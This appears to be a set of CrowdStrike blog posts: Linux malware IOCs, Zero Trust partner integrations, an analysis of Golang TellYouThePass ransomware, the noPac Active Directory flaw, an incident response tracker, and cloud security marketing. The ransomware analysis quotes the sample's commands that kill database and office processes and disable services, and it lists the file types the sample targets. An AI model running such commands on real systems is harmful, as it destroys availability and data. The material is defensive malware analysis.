Fig. 5 – Falcon detection for Linux Mirai malware sample (Click to enlarge)

CrowdStrike Protection for Linux

Linux is one of the primary operating systems for many business-critical applications. As Linux servers can be found on premises and in private and public clouds, protecting them requires a solution that provides runtime protection and visibility for all Linux hosts, regardless of location.

The CrowdStrike Falcon® platform protects Linux workloads, including containers, running in all environments, from public and private clouds to on-premises and hybrid data centers. Using machine learning, artificial intelligence, behavior-based indicators of attack (IOAs) and custom hash blocking to defend Linux workloads against malware and sophisticated threats, the Falcon platform delivers complete visibility and context into any attack on Linux workloads.

Indicators of Compromise (IOCs)

File SHA256
Mozi 4790754ccd895626c67f0d63736577d363de7e7684b624d584615d83532d1414
XorDDoS f85f13bf67bba755ec5f4c46d760f460a2dc137494d7edf64aeb22ddc2f30760
Mirai 4f2f4d758d13a9cb2fd4c71e8015ba622b2b4c1c26ceb1114b258d6e3c174010

Additional Resources

Zero Trust Integrations Are Expanding in the CrowdStrike Partner Ecosystem

13 January 2022 at 07:08

Organizations need to stay ahead of the ever-evolving security landscape. It’s no secret that Zero Trust security is crucial for successful endpoint protection. Due to the rapid transition to a remote workforce and shift from the traditional data center into dynamic cloud infrastructure we’ve witnessed in the last year, more and more companies are finding the need to accelerate their digital transformation to keep pace with the expanding threat surface.

Zero Trust Is Not Optional 

These rapid changes in the work environment have made it very important to shift from the traditional security “trust but verify” model to the Zero Trust model of “never trust, always verify.” Zero Trust requires all users, whether in or outside of the organization’s network, to be authenticated, authorized and continuously validated for security configuration and posture before being granted access to applications and data. 

In fact, 90% of organizations surveyed in July 2021 indicated that they have embarked on their Zero Trust journey, but only 33% of them reported that they were in the implementation phase. 

How CrowdStrike Falcon Zero Trust Assessment (ZTA) Helps

CrowdStrike Falcon Zero Trust Assessment (ZTA) expands Zero Trust beyond authentication to enable detection, alerting and enforcement of conditional access based on device health and compliance checks to mitigate risks. With expanded support for macOS and Linux, Falcon ZTA provides visibility into all endpoints running across all operating platforms in an organization. Falcon ZTA monitors over 120 different unique endpoint settings, including sensor health, applied CrowdStrike policies and native operating system (OS) security settings. Customers receive actionable reports via the CrowdStrike Falcon® console and APIs to ensure that the highest degree of device security is enforced. 

Zero Trust Is Not a One-stop Solution 

Zero Trust is a journey that should cover the important entities — your endpoints, identities and workloads — to maximize protection. 

The continued expansion of the CrowdStrike Zero Trust partner ecosystem provides customers with a broad range of options that integrate with their existing security stack to ensure continuous and dynamic device posture assessment regardless of location, network or user. 

CrowdStrike’s continued expansion of Zero Trust solutions within our partner ecosystem allows companies to find solutions that integrate with their existing solution stack to ensure continuous and dynamic device posture assessment. Our recently announced partners offer a broad range of solutions, so customers have options to select one that supports their specific needs. These Zero Trust integrations provide solutions that give customers the flexibility to set alerts or block access to data, at the IP or application. 

  • Airgap: Airgap’s integration with Falcon ZTA allows customers to reduce their enterprise attack surface and prevent lateral movement across the organization. Customers can leverage a consolidated SaaS management console to configure, manage and update their network access policies based on a device posture and health score provided through Falcon ZTA. Customers can leverage this to prioritize monitoring network traffic using Airgap’s intuitive, easy-to-use interface. In addition, customers can automate highly customized responses to suspected malicious activity across their network through the Airgap interface to CrowdStrike’s endpoint detection and response (EDR) solutions.
  • Appgate: ​​With Appgate SDP and Falcon ZTA, customers can achieve intelligence-aware Zero Trust access to anywhere from anywhere. Using the Falcon ZTA built into the Falcon platform, Appgate SDP can enrich and dynamically adapt secure access entitlements dynamically and continuously to reduce risk. Joint customers can improve security by dynamically restricting access to risky endpoints or users, even during an established session, based on real-time risk detections and indicators of compromise. 
  • CyberArk: The integration between the CyberArk Identity Security Platform and Falcon ZTA gives clients the ability to identify and block out-of-compliance endpoints from connecting to an organization’s IT estate. The Falcon ZTA agent scans the endpoints and provides three scores (overall, OS, sensor_config) that are retrieved at the time of access. The integration allows for the admin to configure a certain threshold that will allow or deny user access to corporate IT resources based on the score returned from the Falcon ZTA API. When a privileged user attempts to connect to an endpoint, CyberArk confirms the Falcon ZTA score, and if it exceeds a certain threshold, their access is denied.
  • TruU: TruU and CrowdStrike have teamed up to combine Falcon ZTA with the TruIdentity Cloud continuous authentication risk engine to provide a comprehensive, best-in-class Zero Trust solution. The combination of device and identity risk allows customers to implement intelligent real-time policies that respond to potential threats by stepping up identity verification on compromised endpoints and limiting access to high-value assets from these endpoints.
  • Twingate: Twingate combined with the Falcon ZTA solution mitigates an organization’s risk from compromised devices through the enforcement of dynamic conditional access based on device health and compliance checks. Every endpoint and user is authenticated and authorized based on user identity as well as the endpoint device’s security posture and risk level before access to sensitive data and corporate assets is granted. This is applied to actual user devices and services that DevOps is running as part of their CI/CD workflows. This integration allows DevSecOps administrators to make more informed decisions on whether access requests should be authorized by leveraging the device risk score returned from the Falcon ZTA API and to configure in Twingate the minimum score thresholds per device.  

These new integrations expand our Zero Trust partner ecosystem beyond the already existing partner integrations with Google Cloud, Netskope and Okta to integrate CrowdStrike Falcon ZTA natively in their products, streamlining operations and simplifying management. CrowdStrike’s continued expansion of Zero Trust integrations offers solutions with key technologies to ensure organizations are protected against modern and evolving threats against multiple attack vectors by securing all hardware and digital assets. Through these technology alliances, customers can maximize Zero Trust coverage across hybrid enterprises and stop breaches in real time.

Additional Resources 

TellYouThePass Ransomware Analysis Reveals a Modern Reinterpretation Using Golang

11 January 2022 at 08:08
  • TellYouThePass ransomware, discovered in 2019, recently re-emerged compiled using Golang 
  • Golang’s popularity among malware developers makes cross-platform development more accessible
  • TellYouThePass ransomware was recently associated with Log4Shell post-exploitation, targeting Windows and Linux
  • The CrowdStrike Falcon® platform protects customers from Golang-written TellYouThePass ransomware using the power of machine learning and behavior-based detection

The TellYouThePass ransomware family was recently reported as a post-exploitation malicious payload used in conjunction with a remote code execution vulnerability in Apache Log4j library, dubbed Log4Shell

TellYouThePass was first reported in early 2019 as a financially motivated ransomware designed to encrypt files and demand payment for restoring them. Targeting both Windows and Linux systems, TellYouThePass ransomware re-emerged in mid-December 2021 along with other ransomware like Khonsari. This lesser-known ransomware family came back into the spotlight as a post-exploitation payload associated with the Log4Shell. The remote code execution vulnerability is estimated to expose affected organizations to a wave of cybersecurity risks.

Previously known TellYouThePass ransomware samples were written in traditional programming languages like Java or .Net., but two new recent samples reported in public repositories have been rewritten and compiled in Golang. 

Golang’s popularity among malware developers has steadily increased over the past years. It allows them to use the same codebase and compile it for all major operating systems, making cross-platform development work more accessible.

What follows is a deeper dive into the new Golang-written TellYouThePass ransomware samples for Windows and Linux and how the CrowdStrike Falcon platform protects against them.

Setting Up the Analysis

We first check the binary for the “Go build id” string to identify the Golang build used for compiling it. In recent campaigns of Go-written malware, especially in ransomware cases, attackers patch the binary to remove this string, making it difficult for researchers to use string-based signatures to detect the binary as Go.

Going through the two samples —

460b096aaf535b0b8f0224da0f04c7f7997c62bf715839a8012c1e1154a38984 (Windows)

5c8710638fad8eeac382b0323461892a3e1a8865da3625403769a4378622077e (Linux)

— we noticed that more than 85% of code in the Windows and Linux versions are almost the same:

Figure 1. The “main.” functions for both Windows and Linux samples are almost identical (Click to enlarge)

A deeper dive into the some of the ransomware’s functions:

Figure 2. TellYouThePass ransomware functions for the Windows sample in IDA Pro (Click to enlarge)

As we have previously discussed, we start by focusing on the “main.” functions in Golang. We notice in this case that the malware authors have left only one main function and changed the other functions to random names, making analysis difficult.

The sample checks the existence of the files showkey.txt and public.txt with the help of OS.Getenv, using ALLUSERSPROFILE and HOMEDRIVE as keys in Windows and Home and /tmp/ in Linux. If it is present, it means encryption occurred, and it exists using runtime_gopanic; otherwise, it creates them.

Figure 3. Encryption function followed by successful encryption for both Linux and Windows (Click to enlarge)

For Windows, the return is C:\\ProgramData and  /root/ directory in Linux. Using path.join to join showkey.txt and public.txtwith the directories results in:

Windows Linux
  • C:\\ProgramData/showkey.txt
  • C:\\ProgramData/public.txt
  • /root/showkey.txt
  • /root/public.txt

Table 1. Directories for saving showkey.txt and public.txt

The sample uses the Golang Crypto Packages for RSA key — some of them are crypto_x509_MarshalPKCS1PublicKey,  crypto_x509_MarshalPKCS1PrivateKey, encoding_pem_EncodeToMemory and crypto_rsa_GenerateMultiPrimeKey.

As seen in Figure 4, crypto_x509_ MarshalPKCS1PrivateKey converts the RSA private key to PKCS #1, ASN.1 DER form. Then, the encoding_pem_EncodeToMemory returns the PEM (Privacy Enhanced Mail) encoding, and after that, runtime_slicebytetostring converts bytes to string, resulting in the conversion of bytes to string (see Figure 5).

Figure 4. Function that generates the RSA private key

Figure 5. The generated RSA key (Click to enlarge)

The RSA public key is generated using the encoding_base64_ptr_Encoding_DecodeString and encoding_pem_encode packages from Golang, as shown in Figure 6.

Figure 6. Base64 decoding (Click to enlarge)

After that, the PERSON_ID stores the encoding generated by “encoding_base64__ptr_Encoding_EncodeToString” (in this case:

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

as array for Base64 std encoding) every time the sample runs, saving it into showkey.txt.

Afterward, another key is generated using the function below (Figure 7), also saving it into public.txt:

Figure 7. Key generation function (Click to enlarge)

Ransomware Behavior Prior to Encryption

TellYouThePass ransomware tries to kill some tasks and services before initiating the encryption routine, as shown in Table 2 below. However, in Linux, it requires root privilege to do that. Targeted applications include various email clients, database applications, web servers and document editors.

It runs various commands using cmd.exe to kill tasks in Windows, and in Linux, it takes the os_exec_command Go package to execute different commands using /bin/bash/:

Windows Linux
  • “taskkill /f /im msftesql.exe “
  • “schtasks /delete /tn WM /F “
  • “taskkill /f /im sqlagent.exe “
  • “taskkill /f /im sqlbrowser.exe “
  • “taskkill /f /im sqlservr.exe “
  • “taskkill /f /im sqlwriter.exe “
  • “taskkill /f /im oracle.exe “
  • “taskkill /f /im ocssd.exe “
  • “taskkill /f /im dbsnmp.exe “
  • “taskkill /f /im synctime.exe “
  • “taskkill /f /im mydesktopqos.exe “
  • “taskkill /f /im agntsvc.exeisqlplussvc.”
  • “taskkill /f /im xfssvccon.exe “
  • “taskkill /f /im mydesktopservice.exe “
  • “taskkill /f /im ocautoupds.exe “
  • “taskkill /f /im agntsvc.exeagntsvc.exe “
  • “taskkill /f /im agntsvc.exeencsvc.exe “
  • “taskkill /f /im firefoxconfig.exe “
  • “taskkill /f /im tbirdconfig.exe “
  • “taskkill /f /im ocomm.exe “
  • “taskkill /f /im mysqld.exe “
  • “taskkill /f /im mysqld-nt.exe “
  • “taskkill /f /im mysqld-opt.exe “
  • “taskkill /f /im dbeng50.exe “
  • “taskkill /f /im sqbcoreservice.exe “
  • “taskkill /f /im excel.exe “
  • “taskkill /f /im infopath.exe “
  • “taskkill /f /im msaccess.exe “
  • “taskkill /f /im mspub.exe “
  • “taskkill /f /im onenote.exe “
  • “taskkill /f /im outlook.exe “
  • “taskkill /f /im powerpnt.exe “
  • “taskkill /f /im steam.exe “
  • “taskkill /f /im sqlservr.exe “
  • “taskkill /f /im thebat.exe “
  • “taskkill /f /im thebat64.exe “
  • “taskkill /f /im thunderbird.exe “
  • “taskkill /f /im visio.exe “
  • “taskkill /f /im winword.exe “
  • “taskkill /f /im wordpad.exe”
  • “taskkill /f /im tnslsnr.exe”
  • “service mysql stop”
  • “/etc/init.d/mysqld stop”
  • “service oracle stop”
  • “systemctl disable \”postgresql*\””
  • “systemctl disable \”mysql*\””
  • “systemctl disable \”oracle*\””

Table 2. TellYouThePass commands that try to terminate some tasks and services before initiating the encryption routine

After that, it iterates through all directories from A to Z and encrypts the files.

Both the Windows and the Linux versions have a list of directory exclusions for encryption, shown in Table 3.

Windows Linux
  • EFI.Boot
  • EFI.Microsoft
  • Windows
  • Program Files
  • All Users
  • Boot
  • IEidcache
  • ProgramData
  • desktop.ini
  • autorun.inf
  • netuser.dat
  • iconcache.db
  • thumbs.db
  • Local Settings
  • bootfont.bin
  • System Volume Information
  • AppData
  • Recycle.Bin
  • Recovery
  • /bin
  • /boot
  • /sbin
  • /tmp
  • /etc
  • /lib
  • /proc
  • /dev
  • /sys
  • /usr/include
  • /usr/java

Table 3. TellYouThePass directory exclusions for encryption

The TellYouThePass ransomware focuses on encrypting popular media and file extensions, saving their paths in the encfile.txt text file, located in the same folder as public.txt and showkey.txt.

Below is the full list of targeted extensions for encryption

1cd, 3dm, 3ds, 3fr, 3g2, 3gp, 3pr, 602, 7z, ps1, 7zip, aac, ab4, accdb, accde, accdr, accdt, ach, acr, act, adb, adp, ads, aes, agdl, ai, aiff, ait, al, aoi, apj, arc, arw, asc, asf, asm, asp, aspx, asx, avi, awg, back, backup, backupdb, bak, bank, bat, bay, bdb, bgt, bik, bin, bkp, blend, bmp, bpw, brd, c, cdf, cdr, cdr3, cdr4, cdr5, cdr6, cdrw, cdx, ce1, ce2, cer, cfg, cgm, cib, class, cls, cmd, cmt, conf, config, contact, cpi, cpp, cr2, craw, crt, crw, cs, csh, csl, csr, css, csv, dac, dat, db, db3, db_journal, dbf, dbx, dc2, dch, dcr, dcs, ddd, ddoc, ddrw, dds, der, des, design, dgc, dif, dip, dit, djv, djvu, dng, doc, docb, docm, docx, dot, dotm, dotx, drf, drw, dtd, dwg, dxb, dxf, dxg, edb, eml, eps, erbsql, erf, exf, fdb, ffd, fff, fh, fhd, fla, flac, flf, flv, flvv, fpx, frm, fxg, gif, gpg, gray, grey, groups, gry, gz, h, hbk, hdd, hpp, html, hwp, ibank, ibd, ibz, idx, iif, iiq, incpas, indd, jar, java, jnt, jpe, jpeg, jpg, jsp, jspx, ashx, js, kc2, kdbx, kdc, key, kpdx, kwm, laccdb, lay, lay6, ldf, lit, log, lua, m, m2ts, m3u, m4p, m4u, m4v, mapimail, max, mbx, md, mdb, mdc, mdf, mef, mfw, mid, mkv, mlb, mml, mmw, mny, moneywell, mos, mov, mp3, mp4, mpeg, mpg, mrw, ms11, msg, myd, myi, nd, ndd, ndf, nef, nk2, nop, nrw, ns2, ns3, ns4, nsd, nsf, nsg, nsh, nvram, nwb, nx2, nxl, nyf, oab, obj, odb, odc, odf, odg, odm, odp, ods, odt, ogg, oil, orf, ost, otg, oth, otp, ots, ott, p12, p7b, p7c, pab, pages, paq, pas, pat, pcd, pct, pdb, pdd, pdf, pef, pem, pfx, php, pif, pl, plc, plus_muhd, png, pot, potm, potx, ppam, pps, ppsm, ppsx, ppt, pptm, pptx, prf, ps, psafe3, psd, pspimage, pst, ptx, pwm, py, qba, qbb, qbm, qbr, qbw, qbx, qby, qcow, qcow2, qed, r3d, raf, rar, rat, raw, rb, rdb, rm, rtf, rvt, rw2, rwl, rwz, s3db, safe, sas7bdat, sav, save, say, sch, sd0, sda, sdf, sh, sldm, sldx, slk, sql, sqlite, sqlite3, sqlitedb, sr2, srf, srt, srw, st4, st5, st6, st7, so, st8, stc, std, sti, stm, stw, stx, svg, swf, sxc, sxd, sxg, sxi, sxm, sxw, tar, tar.bz2, tbk, tex, tga, tgz, thm, tif, tiff, tlg, txt, uop, uot, vb, vbox, vbs, vdi, vhd, vhdx, vmdk, vmsd, vmx, vmxf, vob, wab, wad, wallet, war, wav, wb2, wk1, wks, wma, wmv, wpd, wps, x11, x3f, xis, xla, xlam, xlc, xlk, xlm, xlr, xls, xlsb, xlsm, xlsx, xlt, xltm, xltx, xlw, xml, ycbcra, yuv, zip.

Finally, the ransom note contains information about the encryption algorithm used to encrypt the files, specifically RSA-1024 and AES-256. It also includes the personid, used for identifying the victim. Following 0.05 bitcoin transfer into a designated and hardcoded wallet, attackers promise to provide victims with the decryption tool to recover all files.

Figure 9. TellYouThePass ransom note (Click to enlarge)

CrowdStrike Falcon Protection

The Falcon platform automatically detects and protects against this type of Golang-written malware using the power of the cloud, on-sensor and in-the-cloud machine learning, and indicators of attack (IOAs) to detect the threat. As Figure 10 shows, Falcon’s cloud-based machine learning detects both Golang-written ransomware samples for TellYouThePass, immediately protecting Windows and Linux environments.

CrowdStrike Falcon leverages machine learning to identify known and unknown malware or threats by understanding malicious intent. Both on-sensor and cloud-based machine learning can detect and prevent post-exploitation threats leveraging exploits such as Log4Shell to protect against malware, including the new Golang-written TellYouThePass ransomware.

Figure 10. Falcon detection of Golang-written Windows TellYouThePass ransomware sample (Click to enlarge)

Figure 11. Falcon detection of Golang-written Linux TellYouThePass ransomware sample (Click to enlarge)

The CrowdStrike Falcon platform provides protection against threats and visibility for all hosts in Windows, Linux and macOS, regardless of their location. The Falcon sensor can detect and prevent threats ranging from ransomware, cryptocurrency miners, trojans and botnets to stop today’s most sophisticated threats.

Indicators of Compromise (IOCs)

File/Host sha256
Windows 460b096aaf535b0b8f0224da0f04c7f7997c62bf715839a8012c1e1154a38984
Linux 5c8710638fad8eeac382b0323461892a3e1a8865da3625403769a4378622077e
Windows host 45[.]76[.]99[.]222[:]80
Linux Host 158[.]247[.]216[.]148[:]80

MITRE ATT&CK® Framework Mapping

Attack Id Tactic Description
T1059 Execution Command and Scripting Interpreter
T1053 Execution

Persistence

Privilege Escalation

Scheduled Task/Job
T1027 Defense Evasion Obfuscated Files or Information
T1140 Defense Evasion Deobfuscate/Decode Files or Information
T1083 Discovery File and Directory Discovery
T1057 Discovery Process Discovery
T1560 Collection Archive Collected Data
T1486 Impact Data Encrypted for Impact

Additional Resources

noPac Exploit: Latest Microsoft AD Flaw May Lead to Total Domain Compromise in Seconds

11 January 2022 at 06:16

What Happened?

Microsoft recently published two critical CVEs related to Active Directory (CVE-2021-42278 and CVE-2021-42287), which when combined by a malicious actor could lead to privilege escalation with a direct path to a compromised domain. 

In mid-December 2021, a public exploit that combined these two Microsoft Active Directory design flaws (referred also as “noPac”) was released. The exploit allowed the escalation of privileges of a regular domain user to domain administrator, which enables a malicious actor to launch multiple attacks such as domain takeover or a ransomware attack.

This is a serious concern because this exploit was confirmed by multiple researchers as a low-effort exploit with critical impact. Researchers at Secureworks have demonstrated how to exploit these Active Directory flaws to gain domain privileges in just 16 seconds. Yes, you read it right — a compromised domain in a quarter of a minute! 

Impact and Microsoft Response

These vulnerabilities cannot be taken lightly because there is now a public exploit that allows domain takeover with low effort, using just the default configuration. Gaining domain privileges allows threat actors to gain control over a domain and use it as a starting point to deploy malware, including ransomware. This is one of the most severe exploits discovered in the past 12 months, but it has been less publicly discussed partly due to all of the attention given to the Log4j vulnerability. Microsoft described the recent CVE as “less likely” for compromise, though exploits have already been published.

Due to the criticality of the discovered bugs, Microsoft has published manual guidelines for users, with instructions on what they need to do to lower the possibility of being compromised by this public exploit. Among recommendations, users are required to:

  • Make sure all of the domain controllers (DCs) are patched. If even one of them remains unpatched, it will mean the whole domain is still vulnerable — and practically patching a domain controller is not trivial given the critical operational nature it serves for IT infrastructure.
  • Perform a manual search for suspicious events and then use those events as a starting point for further manual investigation. Not only is the search manual, but it also requires manually specifying all of the domain controllers by name. Again, any manual mistake here might lead to missed hunting leads.

What Does This Mean for Falcon Customers?

CrowdStrike Falcon® Identity Protection customers can automatically detect attempted exploitation of these vulnerabilities — even if they haven’t had an opportunity to apply these patches to the Active Directory DCs. This is thanks to a recently released enhancement that allows automatic detection of CVE-2021-42278 and CVE-2021-42287 exploitation (aka “noPac”), triggering alerts for any exploitation attempts. We understand the already-existing overhead for security teams, and the importance of prioritizing manual efforts and your attention, and therefore we’ve ensured that this detection doesn’t require any additional manual configuration by our customers.

In addition to the detection above, Falcon Identity Protection is able to block noPac with a simple policy to enforce multi factor authentication (MFA) on users, regardless of the detection. Customers with an active Falcon Identity Protection policy for their users are secure.

This won’t be the first time that Falcon Identity Protection customers are protected from discovered flaws in Microsoft Active Directory, enabling them to react to vulnerabilities according to their schedule.

In January 2021, the MSRPC Printer Spooler Relay (CVE-2021-1678) vulnerability was  discovered and required users to patch the environment. And in that case, it wasn’t enough just to patch — additional configuration was required. Falcon Identity Protection also had that exploit covered by detecting NTLM anomalies and NTLM relay attacks. There isn’t yet a detection provided by Microsoft to this day.

We have seen NTLM-related exploits earlier when Drop the MIC 2 (CVE 2019-1166) and Exploiting LMv2 Clients (CVE-2019-1338) were discovered by CrowdStrike researchers. In those cases, Microsoft users were required to urgently patch their environment without any visibility into if the exploit was in use, whereas Falcon Identity Protection customers had active detection and prevention capabilities.

The Bronze Bit attack (CVE-2020-17049) is another example of a vulnerability that was discovered more than a year ago, and Microsoft’s solution was to ask users to immediately patch the domain controllers. While Falcon Identity Protection customers have a detection in place, Microsoft still hasn’t released its planned detection.

There are other vulnerabilities, such as Zerologon (CVE-2020-1472), that are discovered in Microsoft Active Directory every year and ongoing challenges with Microsoft AD supply chain compromises. We probably won’t stop seeing new vulnerabilities, the question that you should ask is how well your organization is protected before you are able to patch your environment and make sure nothing else is broken while doing it. As seen in the example above, Falcon Identity Protection customers are being protected not just by dedicated detections but also by the ability to enforce Zero Trust policy to prevent credential theft and exploitation in the domain.

Conclusion

This vulnerability once again clearly demonstrates the direct relation between identity and ransomware. Patching and changing configuration might take time, especially with multiple vulnerabilities happening at the same time (e.g., Log4j). CrowdStrike believes that our customers should be secured and protected continuously, to allow you to be able to prioritize your work according to your plan.

Additional Resources

CrowdStrike Services Offers Incident Response Tracker for the DFIR Community

11 January 2022 at 08:02
  • The CrowdStrike Incident Response Tracker is a convenient spreadsheet that includes sections to document indicators of compromise, affected accounts, compromised systems and a timeline of significant events
  • CrowdStrike incident response teams have leveraged this type of tracker in thousands of investigations
  • Download the CrowdStrike Incident Response Tracker Template

During a recent client engagement for a tabletop exercise (TTX), it became apparent that the client did not have a methodology for tracking indicators and building an incident timeline. The CrowdStrike Services team wanted to provide more information to our client on how incidents can and should be tracked, but nothing was available in the public domain that was simple to implement and could be immediately leveraged by responders. To address this gap, we are releasing the CrowdStrike Incident Response Tracker spreadsheet, which is organized into a number of tabs to record various classes of incident-related events in a structured and repeatable manner. 

Digital forensics and incident response (DFIR) teams are typically tasked with performing complex technical investigations that involve receiving and reviewing system images, memory snapshots, logs and other data sources. This results in volumes of evidence tracking, taskings and technical findings across many workstreams. 

Though effective response relies on many elements working harmoniously together, accurately recording and communicating investigative findings is arguably the most critical. One way to do so is to utilize a structured incident response tracker for each investigation that can be used to consolidate and communicate pertinent information in a repeatable fashion. The section below describes how the CrowdStrike Incident Response (IR) Tracker can be utilized and some of the ways it can make managing an incident just a little bit easier.

CrowdStrike IR Tracker Overview

The benefit of using a tool like the CrowdStrike IR Tracker is that it provides a single place for synthesizing key incident information, including:

  • A consolidated incident timeline that forms the basis of the incident narrative
  • Incident indicators (e.g., IP addresses, domain names, malware names/hashes, registry entries, etc.)
  • Affected account details and systems of interest
  • Incident metadata such as key contacts, meeting details, collected evidence items and incident-related requests and tasks

Specifically, the CrowdStrike IR Tracker consists of the following tabs:

  • Investigation Notes: Area for tracking investigation information such as related incident tickets, conference room and teleconference bridge details, etc. 
  • Contact Info: External and internal contact information for relevant response personnel
  • Timeline: Chronological list of attacker activity and related events
  • Systems: Systems accessed or compromised by the threat actor(s)
  • Accounts: Accounts exposed or compromised by the threat actor(s)
  • Host Indicators: File names, directory paths, cryptographic hashes, registry entries, etc., of interest to the investigation (more detail provided below)
  • Network Indicators: External IP addresses, URLs, domain names, user agent strings, etc., of interest to the investigation (more detail provided below)
  • Request and Task Tracker: Area for tracking incident-related requests and tasking
  • Evidence Tracker: Area for tracking evidence collected during the investigation
  • Forensic Keywords: Incident-specific keywords to facilitate forensic analysis
  • Investigative Queries: Incident-specific queries for SIEM, log correlation and investigative platforms to facilitate investigative analysis 

An overview of three of our favorite and most heavily leveraged IR Tracker tabs are described below.

Host Indicators Tab

First, the Host Indicators tab is used to record the suspected and confirmed host indicators of compromise (IOCs) for the incident. Common examples of host indicators include file names and paths, file hashes, file sizes, service names and registry keys. Having this information readily available for the investigation teams speeds up the analysis and investigation processes. Recording host indicators in a single location gives the team the ability to search for these across additional data sets and pivot to associated indicators from further analysis, and it provides inputs for detection and prevention tools such as a security information and event management (SIEM) or endpoint detection and response (EDR) platform.

Figure 1. Example host indicators (Click to enlarge)

The short extract shown above provides the investigation team with the context they need to further their collection and analysis of the incident. Given what we can see above, it is a fair assessment that anything found in the “C:\Logs” path is highly suspicious and should be collected for analysis. Other teams can also search for evidence of these host indicators with their tools using the various keys that have been recorded.

Network Indicators Tab

Another tab in the CrowdStrike IR Tracker is the Network Indicators tab where the network-related indicators are recorded. An example of just 10 network indicators is shown in Figure 2. Keeping a consolidated list of network indicators simplifies searching additional data sets for the same indicators, helps responders understand what blocks they may want to put in place in the network perimeter, ensures they have an up-to-date list of known network indicators in their SIEM, and pivot to additional threat actor activity from these indicators.

Figure 2. Example network indicators (Click to enlarge)

Timeline Tab

The consolidated incident timeline is arguably the biggest benefit of the CrowdStrike IR Tracker. The consolidated incident timeline provides a place for responders to track all relevant incident information, including, but not limited to:

  • Suspect account login times and source and destination system(s)
  • File creation, modification, deletion and access times 
  • Process creation, start and stop times 
  • Registry key creation times
  • Network connections
  • Firewall events
  • EDR events

The Timeline tab provides the incident response team with the view of how and when the incident started, how and where the threat actor(s) moved laterally through the organization, and what data may have been impacted. The timeline helps answer the “5Ws and 1H” of the incident: 

  • Who: can be evident from the tactics, techniques and procedures (TTPs) identified, but not always possible 
  • What: impacted systems and data 
  • Where: impacted systems and networks 
  • When: earliest and most recent evidence of threat actor activity, as well as key events in between
  • Why: can be evident from the TTPs identified, but not always possible
  • How: the TTPs of the incident

A fictitious example timeline extract is shown below. There is a lot of information in this very short timeline extract, but we can see that there has been credential access through a number of utilities, webshells, reconnaissance tools and lateral movement. We can also see the times of activity from the threat actor(s) on multiple systems, ranging from Sept. 16, 2021, through Sept. 26, 2021.

Figure 3. Example timeline (Click to enlarge)

One word of warning — and the constant trap that all investigators deal with every day — is the date formatting in the CrowdStrike IR Tracker. Our strongest recommendation is to ensure that all dates are converted to UTC time (00:00) and in ISO 8601 date format. An example of this format is the following date and time: “2021-09-26T18:54:07.350Z.” This same date format and consistency in time zone ensures that when we sort the timeline, the data is sorted chronologically. If there is a mess of date formats from different time zones to take into account, we will have a hard time understanding the threat actor’s path through the network. If UTC time zone and ISO 8601 time format are always used in the timeline, then life will be a little bit easier. When running a complex investigation, having something that is easier matters, and frankly, when it comes to incidents, being accurate and efficient is paramount.

Conclusion

With this consolidated and organized information, we can focus on helping the organization identify the impact to business assets, and in conjunction with legal counsel, identify any regulatory reporting requirements. The CrowdStrike IR Tracker also helps ensure that the root cause of the incident gets identified, so your organization can remediate the vulnerabilities that were exploited and led to the incident. 

To make the incident easier to understand for business, we often create attack diagrams or graphical timelines from the consolidated Timeline tab. CrowdStrike often creates these diagrams to succinctly explain incidents for clients that have experienced extensive data breaches of hundreds of systems or over multiple years. 

Finally, it is recommended to use an online collaboration spreadsheet technology such as Office 365 or Google Sheets. Using collaboration tools provides an efficient means for different people to update an online document concurrently and minimizes the risk of versioning issues. Data is also updated in near real time, which helps teams communicate effectively. Some of the repetitive copy and paste tasks can be automated with the scripting features provided by the collaboration technology, but we will leave that for a follow-up blog, and we are happy to hear your ideas on how to minimize the effort on keeping the tracker up to date.

The CrowdStrike IR Tracker itself is not a panacea to cure all ills of the IR process, but rather a tool that, if used correctly, can greatly increase efficiency of collaboration between individuals and teams. Like all tools, it must be used correctly, and one of the key tenets of the CrowdStrike IR teams is our “tracker hygiene.” We know that if the CrowdStrike IR Tracker is not maintained then the results are going to be poor. The tracker gives back, but it can only give back from the effort that is put into it by ALL team members, ALL of the time. Maintaining the tracker for the incident takes work and discipline, but it is our belief that it is very much worth the effort.

CrowdStrike is sharing the CrowdStrike Incident Response Tracker Template to give the DFIR community a starting point for collecting and recording incident artifacts in a consolidated and organized fashion. It is our hope that this resource is a useful baseline for building upon within your own organization, or when an IR tracker is needed on short notice.

Additional Resources

Why You Need an Adversary-focused Approach to Stop Cloud Breaches

7 January 2022 at 08:22

It should come as little surprise that when enterprise and IT leaders turned their attention to the cloud, so did attackers.

Unfortunately, the security capabilities of enterprises have not always kept up with the threat landscape. Poor visibility, management challenges and misconfigurations combine with other security and compliance issues to make protecting cloud environments a complex endeavor.

The price of failure is high. According to IBM’s Cost of a Data Breach Report 2021, it took organizations at a “mature stage of cloud modernization” an average of 252 days to identify and contain a cloud-based data breach. Public cloud breaches were the most costly, at an estimated average price tag of $4.8 million USD. The costs for organizations with a high level of cloud migration were also significantly higher than for those with low levels of cloud migration.

Silos, Silos and More Silos

As the risk has grown, so too has the need for organizations to rethink their approach to security. Silos are the death of security in the cloud. Yet, silos are common for organizations using multiple tools to manage user access to their cloud assets. If security is not implemented in a unified, integrated way, blind spots and security issues are inevitable. 

Many organizations have responded by implementing cloud-native tools from cloud security platforms. However, many of these tools are focused on pre-runtime vulnerabilities and compliance and only offer a snapshot of the organization’s security posture at a moment in time. The movement to “shift security left” and bake it deeper into the development process has allowed organizations to catch security vulnerabilities earlier, but insecure APIs, misconfigurations and other issues can slip through the cracks due to the dynamic nature of cloud environments and the desire to avoid any slowdown in application delivery. 

In the recent CrowdStrike Services Cyber Front Lines Report, our researchers found that adversaries were targeting neglected cloud infrastructure that was scheduled for retirement but still contained sensitive data. These attacks serve as a reminder that threat actors will take advantage of any security hole caused by missteps or inattention.

Why Take an Adversary-focused Approach

Finding the right defensive strategy is contingent on understanding how attackers are targeting cloud environments. At CrowdStrike, we call this taking an adversary-focused approach. Our strategy is powered by the CrowdStrike Security Cloud, one of the largest, threat-centric data fabrics in the world. 

The Security Cloud correlates trillions of security events per day with indicators of attack, CrowdStrike’s industry leading threat intelligence and enterprise telemetry from across customer endpoints, workloads, identities, DevOps, IT assets and configurations. Using our world-class AI and ML models, the Security Cloud turns this data into action, identifying the shifts in adversarial tactics to better understand how an adversary will target an organization and to prevent threats in real time. The CrowdStrike Falcon® platform transforms this intelligence into hyper-accurate detections, automated protection and remediation, elite threat hunting, and prioritized observability of vulnerabilities so that security teams can respond effectively.

